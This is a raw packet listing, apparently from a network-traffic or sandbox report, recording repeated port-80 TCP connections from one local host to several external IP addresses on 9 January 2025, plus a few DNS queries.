Jan 9, 2025 08:33:20.202425957 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.202663898 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:20.203047991 CET	80	49760	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:20.203305960 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:21.414865017 CET	49760	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:22.432188034 CET	49761	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:22.551260948 CET	80	49761	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:22.551465988 CET	49761	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:22.554100037 CET	49761	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:22.673095942 CET	80	49761	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:22.888756037 CET	80	49761	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:22.888766050 CET	80	49761	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:22.889209032 CET	49761	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:22.889398098 CET	80	49761	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:22.889642954 CET	49761	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:22.890171051 CET	49761	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:23.009161949 CET	80	49761	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:39.141724110 CET	49762	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:33:39.379669905 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.379823923 CET	49762	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:33:39.384263992 CET	49762	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:33:39.617858887 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628113985 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628202915 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628334045 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628418922 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628484964 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628493071 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:39.628725052 CET	49762	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:33:39.628894091 CET	49762	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:33:39.629687071 CET	49762	80	192.168.11.20	194.9.94.85
Jan 9, 2025 08:33:39.867716074 CET	80	49762	194.9.94.85	192.168.11.20
Jan 9, 2025 08:33:44.645546913 CET	49763	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:44.787862062 CET	80	49763	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:44.788033962 CET	49763	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:44.794708014 CET	49763	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:44.948772907 CET	80	49763	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:44.948894978 CET	80	49763	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:44.949090958 CET	49763	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:46.299915075 CET	49763	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:47.317069054 CET	49764	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:47.458858013 CET	80	49764	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:47.459048986 CET	49764	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:47.462510109 CET	49764	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:47.607381105 CET	80	49764	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:47.607491970 CET	80	49764	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:47.607861042 CET	49764	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:48.971326113 CET	49764	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:49.988091946 CET	49765	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:50.130333900 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.130476952 CET	49765	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:50.137120962 CET	49765	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:50.137171984 CET	49765	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:50.279529095 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.279783010 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.279789925 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.279797077 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.280031919 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.280040026 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.282599926 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.282608032 CET	80	49765	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:50.282768965 CET	49765	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:51.642687082 CET	49765	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:52.659498930 CET	49766	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:52.801474094 CET	80	49766	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:52.801620960 CET	49766	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:52.806382895 CET	49766	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:52.951255083 CET	80	49766	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:52.951263905 CET	80	49766	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:52.951272011 CET	80	49766	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:52.951673031 CET	49766	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:52.952255011 CET	49766	80	192.168.11.20	45.33.23.183
Jan 9, 2025 08:33:53.093982935 CET	80	49766	45.33.23.183	192.168.11.20
Jan 9, 2025 08:33:57.953952074 CET	49767	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:58.072525024 CET	80	49767	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:58.072846889 CET	49767	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:58.076328039 CET	49767	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:58.195009947 CET	80	49767	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:58.644093990 CET	80	49767	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:58.644109964 CET	80	49767	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:58.644237995 CET	49767	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:58.644880056 CET	80	49767	104.21.64.1	192.168.11.20
Jan 9, 2025 08:33:58.645059109 CET	49767	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:33:59.577992916 CET	49767	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:00.595144033 CET	49768	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:00.713576078 CET	80	49768	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:00.713792086 CET	49768	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:00.717298985 CET	49768	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:00.836903095 CET	80	49768	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:01.250634909 CET	80	49768	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:01.250648975 CET	80	49768	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:01.250813007 CET	49768	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:01.251306057 CET	80	49768	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:01.251483917 CET	49768	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:02.234132051 CET	49768	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.251105070 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.370263100 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.370471954 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.373996973 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.374020100 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.374103069 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.493263960 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.493500948 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.493509054 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.493516922 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.494040966 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.918781042 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.918798923 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.919070959 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:03.919647932 CET	80	49769	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:03.919792891 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:04.889261007 CET	49769	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:05.905500889 CET	49770	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:06.023998976 CET	80	49770	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:06.024207115 CET	49770	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:06.029417038 CET	49770	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:06.147814989 CET	80	49770	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:06.564337969 CET	80	49770	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:06.564348936 CET	80	49770	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:06.564505100 CET	80	49770	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:06.564728975 CET	49770	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:06.564728975 CET	49770	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:06.566106081 CET	49770	80	192.168.11.20	104.21.64.1
Jan 9, 2025 08:34:06.684386969 CET	80	49770	104.21.64.1	192.168.11.20
Jan 9, 2025 08:34:11.577874899 CET	49771	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:11.750333071 CET	80	49771	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:11.750520945 CET	49771	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:11.753988981 CET	49771	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:11.926189899 CET	80	49771	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:11.943588018 CET	80	49771	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:11.943603992 CET	80	49771	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:11.943783045 CET	49771	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:13.262433052 CET	49771	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:14.280862093 CET	49772	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:14.453385115 CET	80	49772	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:14.453596115 CET	49772	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:14.457024097 CET	49772	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:14.629515886 CET	80	49772	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:14.647979021 CET	80	49772	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:14.648437023 CET	80	49772	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:14.648706913 CET	49772	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:15.964894056 CET	49772	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:16.980973959 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:17.153292894 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.153624058 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:17.157490969 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:17.157515049 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:17.157598972 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:17.329936028 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.330148935 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.330157042 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.330413103 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.330703974 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.349061966 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.349072933 CET	80	49773	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:17.349308968 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:18.667610884 CET	49773	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:19.684801102 CET	49774	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:19.857290983 CET	80	49774	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:19.857502937 CET	49774	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:19.859879971 CET	49774	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:20.032464981 CET	80	49774	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:20.049864054 CET	80	49774	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:20.049875021 CET	80	49774	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:20.050156116 CET	49774	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:20.051250935 CET	49774	80	192.168.11.20	199.192.21.169
Jan 9, 2025 08:34:20.223525047 CET	80	49774	199.192.21.169	192.168.11.20
Jan 9, 2025 08:34:35.368503094 CET	49775	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:35.670902967 CET	80	49775	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:35.671104908 CET	49775	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:35.674623013 CET	49775	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:35.977158070 CET	80	49775	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:36.700869083 CET	80	49775	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:36.701059103 CET	80	49775	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:36.701256990 CET	49775	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:37.179619074 CET	49775	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:38.196065903 CET	49776	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:38.509824991 CET	80	49776	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:38.510067940 CET	49776	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:38.513562918 CET	49776	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:38.827351093 CET	80	49776	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:39.559170961 CET	80	49776	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:39.559353113 CET	80	49776	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:39.559555054 CET	49776	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:40.022073984 CET	49776	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:41.038217068 CET	49777	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:41.341744900 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:41.341932058 CET	49777	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:41.349673986 CET	49777	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:41.653503895 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:41.653713942 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:41.653721094 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:41.654211998 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:42.340070963 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:42.340081930 CET	80	49777	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:42.340276003 CET	49777	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:42.865737915 CET	49777	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:43.881453037 CET	49778	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:44.185786963 CET	80	49778	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:44.186028004 CET	49778	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:44.188394070 CET	49778	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:44.492975950 CET	80	49778	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:45.197175980 CET	80	49778	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:45.197189093 CET	80	49778	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:45.197545052 CET	49778	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:45.198182106 CET	49778	80	192.168.11.20	47.83.1.90
Jan 9, 2025 08:34:45.502559900 CET	80	49778	47.83.1.90	192.168.11.20
Jan 9, 2025 08:34:50.208148003 CET	49779	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:50.345238924 CET	80	49779	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:50.345469952 CET	49779	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:50.349009991 CET	49779	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:50.485385895 CET	80	49779	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:50.485637903 CET	80	49779	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:50.485908985 CET	49779	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:51.863248110 CET	49779	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:52.879492998 CET	49780	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:53.017267942 CET	80	49780	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:53.017473936 CET	49780	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:53.021311045 CET	49780	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:53.158258915 CET	80	49780	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:53.158271074 CET	80	49780	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:53.158591032 CET	49780	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:54.534615993 CET	49780	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:55.550682068 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.564816952 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.701009989 CET	80	49781	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:56.701180935 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.705024004 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.705060005 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.841535091 CET	80	49781	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:56.841547012 CET	80	49781	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:56.841845036 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.841902018 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:56.885804892 CET	80	49781	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:56.979063034 CET	80	49781	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:56.979288101 CET	80	49781	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:56.979459047 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:58.221373081 CET	49781	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:59.237471104 CET	49782	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:59.374777079 CET	80	49782	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:59.375044107 CET	49782	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:59.377386093 CET	49782	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:59.515542030 CET	80	49782	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:59.515552044 CET	80	49782	13.248.169.48	192.168.11.20
Jan 9, 2025 08:34:59.515754938 CET	49782	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:59.516982079 CET	49782	80	192.168.11.20	13.248.169.48
Jan 9, 2025 08:34:59.652446985 CET	80	49782	13.248.169.48	192.168.11.20
Jan 9, 2025 08:35:04.533870935 CET	49783	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:04.881397009 CET	80	49783	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:04.881639957 CET	49783	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:04.888259888 CET	49783	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:05.234462023 CET	80	49783	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:05.235156059 CET	80	49783	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:05.235165119 CET	80	49783	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:05.235171080 CET	80	49783	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:05.235337973 CET	49783	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:06.391335011 CET	49783	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:07.408260107 CET	49784	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:07.754506111 CET	80	49784	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:07.754805088 CET	49784	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:07.758378029 CET	49784	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:08.104054928 CET	80	49784	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:08.105010986 CET	80	49784	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:08.105021000 CET	80	49784	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:08.105034113 CET	80	49784	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:08.105253935 CET	49784	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:09.266108036 CET	49784	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:10.282309055 CET	49785	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:10.624320030 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.624557018 CET	49785	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:10.628104925 CET	49785	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:10.628170967 CET	49785	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:10.628180027 CET	49785	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:10.969294071 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970221043 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970231056 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970238924 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970247030 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970253944 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970259905 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970266104 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:10.970303059 CET	80	49785	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:13.156744003 CET	49786	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:13.507986069 CET	80	49786	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:13.508204937 CET	49786	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:13.512656927 CET	49786	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:13.863827944 CET	80	49786	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:13.864566088 CET	80	49786	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:13.864578962 CET	80	49786	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:13.864588976 CET	80	49786	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:13.864902973 CET	49786	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:13.865530014 CET	49786	80	192.168.11.20	160.25.166.123
Jan 9, 2025 08:35:14.216464996 CET	80	49786	160.25.166.123	192.168.11.20
Jan 9, 2025 08:35:18.873752117 CET	49787	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:18.993279934 CET	80	49787	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:18.993547916 CET	49787	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:18.996968031 CET	49787	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:19.116363049 CET	80	49787	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:19.126074076 CET	80	49787	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:19.126223087 CET	80	49787	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:19.126358986 CET	49787	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:20.513701916 CET	49787	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:21.529390097 CET	49788	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:21.648468018 CET	80	49788	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:21.648741961 CET	49788	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:21.652122021 CET	49788	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:21.771378994 CET	80	49788	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:21.777951002 CET	80	49788	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:21.777959108 CET	80	49788	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:21.778266907 CET	49788	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:23.153245926 CET	49788	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:24.169385910 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:24.288589954 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.288795948 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:24.292314053 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:24.292362928 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:24.292413950 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:24.411660910 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.411881924 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.411889076 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.412185907 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.412420034 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.412430048 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.423959970 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.424645901 CET	80	49789	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:24.424870968 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:25.794651031 CET	49789	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:26.809642076 CET	49790	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:26.928402901 CET	80	49790	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:26.928670883 CET	49790	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:26.933732033 CET	49790	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:27.052092075 CET	80	49790	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:27.063972950 CET	80	49790	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:27.064541101 CET	80	49790	172.67.132.227	192.168.11.20
Jan 9, 2025 08:35:27.064785004 CET	49790	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:27.065812111 CET	49790	80	192.168.11.20	172.67.132.227
Jan 9, 2025 08:35:27.184185982 CET	80	49790	172.67.132.227	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:30:05.139106989 CET	60272	53	192.168.11.20	1.1.1.1
Jan 9, 2025 08:30:06.144231081 CET	60272	53	192.168.11.20	9.9.9.9
Jan 9, 2025 08:30:06.390722990 CET	53	60272	9.9.9.9	192.168.11.20
